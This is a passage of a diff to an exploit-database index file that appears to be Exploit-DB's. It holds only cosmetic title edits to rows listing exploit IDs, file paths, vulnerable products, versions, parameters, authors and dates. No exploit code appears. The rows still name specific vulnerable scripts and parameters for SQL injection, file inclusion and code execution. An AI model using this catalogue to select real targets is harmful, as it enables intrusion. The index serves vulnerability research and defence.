2.0 voirannonce.php no Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 2.0 - voirannonce.php no Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29254,platforms/php/webapps/29254.txt,"KDPics 1.11/1.16 - index.php3 categories Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29255,platforms/php/webapps/29255.txt,"KDPics 1.11/1.16 galeries.inc.php3 categories Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 @@ -26281,12 +26281,12 @@ id,file,description,date,author,platform,type,port 29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 lire-avis.php aa Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 +29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM Login.ASP SQL Injection",2006-12-09,ajann,asp,webapps,0 29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 29281,platforms/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",windows,remote,0 -29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 +29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 form.php - Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 form.php Multiple Parameter XSS",2006-12-14,Mr_KaLiMaN,php,webapps,0 29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 mod/forum/discuss.php navtail Parameter XSS",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS",2006-12-15,shinnai,windows,dos,0 @@ -26297,7 +26297,7 @@ id,file,description,date,author,platform,type,port 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 -29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 +29295,platforms/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 29297,platforms/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 List Command Buffer Overflow",2006-12-19,"Joxean Koret",hardware,dos,0 29298,platforms/php/webapps/29298.txt,"OSTicket 1.2/1.3 Support Cards View.php Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 @@ -26324,11 +26324,11 @@ id,file,description,date,author,platform,type,port 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,Metasploit,php,remote,80 29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,Metasploit,php,remote,80 -29321,platforms/linux/remote/29321.rb,"Zabbix Authenticated Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 -29322,platforms/php/remote/29322.rb,"ISPConfig Authenticated Arbitrary PHP Code Execution",2013-10-31,Metasploit,php,remote,80 -29323,platforms/linux/remote/29323.rb,"OpenMediaVault Cron Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 -29324,platforms/linux/remote/29324.rb,"Moodle Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 -29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source Authenticated PHP Code Execution",2013-10-31,Metasploit,php,remote,80 +29321,platforms/linux/remote/29321.rb,"Zabbix - Authenticated Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 +29322,platforms/php/remote/29322.rb,"ISPConfig - Authenticated Arbitrary PHP Code Execution",2013-10-31,Metasploit,php,remote,80 +29323,platforms/linux/remote/29323.rb,"OpenMediaVault Cron - Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 +29324,platforms/linux/remote/29324.rb,"Moodle - Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 +29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source - Authenticated PHP Code Execution",2013-10-31,Metasploit,php,remote,80 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 30207,platforms/asp/webapps/30207.txt,"FuseTalk 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 @@ -26394,10 +26394,10 @@ id,file,description,date,author,platform,type,port 29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0 29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0 -29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 edittag.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 edittag.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 edittag_mp.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 edittag_mp.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 edittag.cgi file Variable - Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 edittag.pl file Variable - Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 edittag_mp.cgi file Variable - Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 edittag_mp.pl file Variable - Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 mkpw_mp.cgi plain Parameter XSS",2007-01-05,NetJackal,cgi,webapps,0 29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 mkpw.pl plain Parameter XSS",2007-01-05,NetJackal,cgi,webapps,0 29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 mkpw.cgi plain Parameter XSS",2007-01-05,NetJackal,cgi,webapps,0 @@ -26446,14 +26446,14 @@ id,file,description,date,author,platform,type,port 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote,0 29441,platforms/osx/dos/29441.txt,"Apple Mac OS X 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - Privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 -29443,platforms/windows/dos/29443.py,"VideoLan VLC Media Player 0.8.6a Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 +29443,platforms/windows/dos/29443.py,"VideoLan VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (DoS)",2013-11-05,"Necmettin COSKUN",windows,dos,0 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Local Privilege Escalation",2006-12-18,anonymous,linux,local,0 29447,platforms/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos,0 29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 -29449,platforms/multiple/remote/29449.html,"Oracle ORADC ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote,0 +29449,platforms/multiple/remote/29449.html,"Oracle ORADC - ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - cp_downloads.php did Parameter SQL Injection",2007-01-12,Coloss,php,webapps,0 29452,platforms/osx/dos/29452.txt,"Apple Mac OS X 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos,0 @@ -26512,20 +26512,20 @@ id,file,description,date,author,platform,type,port 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injection",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 - Akismet Plugin Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 Encoded Space (%20) Request Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 -30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 +30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal - Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass",2007-05-15,"Matousec Transparent security",multiple,local,0 30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.php Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps,0 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 -30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote,0 +30045,platforms/windows/remote/30045.html,"PrecisionID Barcode - PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote,0 30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 30047,platforms/php/webapps/30047.txt,"VBulletin 3.6.6 Calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 ShopContent.ASP Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme header.php s Parameter XSS",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Path Disclosure",2007-05-17,kefka,php,webapps,0 -30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 +30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 30054,platforms/jsp/webapps/30054.txt,"Sonicwall Gms 7.x - Filter Bypass & Persistent (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 @@ -26572,7 +26572,7 @@ id,file,description,date,author,platform,type,port 29535,platforms/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,osx,dos,0 29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0 29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 - Index.php SQL Injection",2007-01-27,adexior,php,webapps,0 -29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client DAPCNFSD.DLL Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 +29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client - DAPCNFSD.DLL Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter XSS",2007-02-26,r00t,php,webapps,0 @@ -26594,9 +26594,9 @@ id,file,description,date,author,platform,type,port 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0 -29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload Arbitrary File Upload",2013-11-25,Metasploit,windows,remote,8020 +29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload - Arbitrary File Upload",2013-11-25,Metasploit,windows,remote,8020 29551,platforms/osx/dos/29551.txt,"Apple Mac OS X 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 -29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS SQL Injection",2013-11-13,Metasploit,windows,remote,402 +29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS - SQL Injection",2013-11-13,Metasploit,windows,remote,402 29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 29554,platforms/osx/dos/29554.txt,"Apple Mac OS X 10.4.x - iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 29555,platforms/osx/dos/29555.txt,"Apple Mac OS X 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 @@ -26606,8 +26606,8 @@ id,file,description,date,author,platform,type,port 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0 29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 Lang.php Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 - Index.php Cross-Site Scripting",2007-02-02,Doz,php,webapps,0 -29562,platforms/php/webapps/29562.txt,"PortailPHP 2 mod_news/index.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 -29563,platforms/php/webapps/29563.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 +29562,platforms/php/webapps/29562.txt,"PortailPHP 2 mod_news/index.php chemin Parameter Traversal - Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 +29563,platforms/php/webapps/29563.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Traversal - Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 29564,platforms/php/webapps/29564.txt,"PortailPHP 2 mod_news/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29565,platforms/php/webapps/29565.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 @@ -26615,10 +26615,10 @@ id,file,description,date,author,platform,type,port 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion",2007-02-05,anonymous,php,webapps,0 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF",2013-11-13,"Hubert Gradek",hardware,webapps,0 -29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 +29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 System Control Panel CronJob - Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 29572,platforms/php/webapps/29572.txt,"CPanel 11 PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 29573,platforms/multiple/remote/29573.xml,"Sage 1.3.6 Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote,0 -29574,platforms/php/webapps/29574.php,"eXtreme File Hosting Arbitrary RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 +29574,platforms/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 29575,platforms/windows/remote/29575.txt,"Plain Old Webserver 0.0.7/0.0.8 Firefox Extension Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote,0 29576,platforms/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps,0 29577,platforms/php/dos/29577.php,"PHP 5.2.1 STR_IReplace Remote Denial of Service",2007-02-09,"Thomas Hruska",php,dos,0 @@ -26679,15 +26679,15 @@ id,file,description,date,author,platform,type,port 29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",ios,webapps,0 -29634,platforms/php/webapps/29634.txt,"Plantilla list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 +29634,platforms/php/webapps/29634.txt,"Plantilla list_main_pages.php nfolder Parameter Traversal - Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 Edit.php Directory Traversal",2007-02-22,"laurent gaffie",php,webapps,0 29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 install/index.php step Parameter Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0 -29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 install/index.php step Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 +29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 install/index.php step Parameter Traversal - Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - index.php load Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - index.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0 29640,platforms/php/webapps/29640.txt,"Shop Kit Plus StyleCSS.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 - Index.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 -29642,platforms/php/webapps/29642.txt,"Simple one-file gallery gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 +29642,platforms/php/webapps/29642.txt,"Simple one-file gallery gallery.php f Parameter Traversal - Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 29643,platforms/php/webapps/29643.txt,"Simple one-file gallery gallery.php f Parameter XSS",2007-02-23,"laurent gaffie",php,webapps,0 29644,platforms/php/webapps/29644.txt,"Pickle 0.3 Download.php Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0 29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - ShowCode.php Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0 @@ -26710,7 +26710,7 @@ id,file,description,date,author,platform,type,port 29663,platforms/php/webapps/29663.txt,"SolarPay Index.php Local File Inclusion",2007-02-26,"Hasadya Raed",php,webapps,0 29664,platforms/windows/dos/29664.txt,"Microsoft Office Publisher 2007 - Remote Denial of Service (DoS)",2007-02-26,"Tom Ferris",windows,dos,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 -29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI close_window.cgi Buffer Overflow",2013-11-18,Metasploit,hardware,remote,80 +29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI - close_window.cgi Buffer Overflow",2013-11-18,Metasploit,hardware,remote,80 29667,platforms/php/webapps/29667.txt,"WordPress Euclid Theme 1.x.x - CSRF",2013-11-18,DevilScreaM,php,webapps,80 29668,platforms/php/webapps/29668.txt,"WordPress Dimension Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 29669,platforms/php/webapps/29669.txt,"WordPress Amplus Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 @@ -26718,7 +26718,7 @@ id,file,description,date,author,platform,type,port 30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 - admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0 30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos,0 -30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 +30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 - Mod_Lettermansubscribe.php Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps,0 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 @@ -26861,18 +26861,18 @@ id,file,description,date,author,platform,type,port 30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 super/info.php BASE_URL Variable Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - setup/footer.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 - Index.php Cross-Site Scripting",2007-06-02,vagrant,php,webapps,0 -30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",multiple,dos,0 +30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 - Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",multiple,dos,0 30140,platforms/php/webapps/30140.txt,"Okyanusmedya Index.php Cross-Site Scripting",2007-06-04,vagrant,php,webapps,0 30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 Haberoku.ASP SQL Injection",2007-06-04,ertuqrul,asp,webapps,0 30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",linux,remote,0 30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.php Cross-Site Scripting",2007-06-04,"Glafkos Charalambous ",php,webapps,0 -30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 eSellerateControl365.DLL ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0 +30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 - eSellerateControl365.DLL ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0 30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent",2013-12-08,Vulnerability-Lab,ios,webapps,0 30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0 30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 -30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery Download_Script.ASP Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 +30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery Download_Script.ASP - Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service",2007-06-06,"Dennis Rand",windows,dos,0 30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9 - AtomPhotoBlog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 @@ -26918,7 +26918,7 @@ id,file,description,date,author,platform,type,port 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 Fotokategori.ASP SQL 